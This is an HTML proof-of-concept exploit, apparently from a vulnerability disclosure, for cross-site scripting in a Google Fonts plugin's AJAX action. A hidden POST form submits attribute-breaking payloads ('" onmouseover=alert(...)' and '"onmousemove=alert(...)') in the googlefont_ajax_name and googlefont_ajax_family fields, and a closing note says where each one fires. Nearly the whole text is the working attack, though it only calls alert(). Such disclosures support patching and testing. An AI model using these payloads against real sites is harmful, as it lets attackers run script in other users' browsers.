<form action="" id="hack" method="POST">
        <input type="hidden" name="action" value="googlefont_action" />
        <input type="hidden" name="googlefont_ajax_name" value='" onmouseover=alert(/XSS-1/) t="' />
        <input type="hidden" name="googlefont_ajax_family" value='"onmousemove=alert(/XSS-2/)//' />
        <input type="submit" value="Submit request" />

    var form1 = document.getElementById('hack');

The XSS from the googlefont_ajax_name will be triggered when the mouse will be over any of the checkbox. The one from googlefont_ajax_family  will be triggered only in section 1 and 4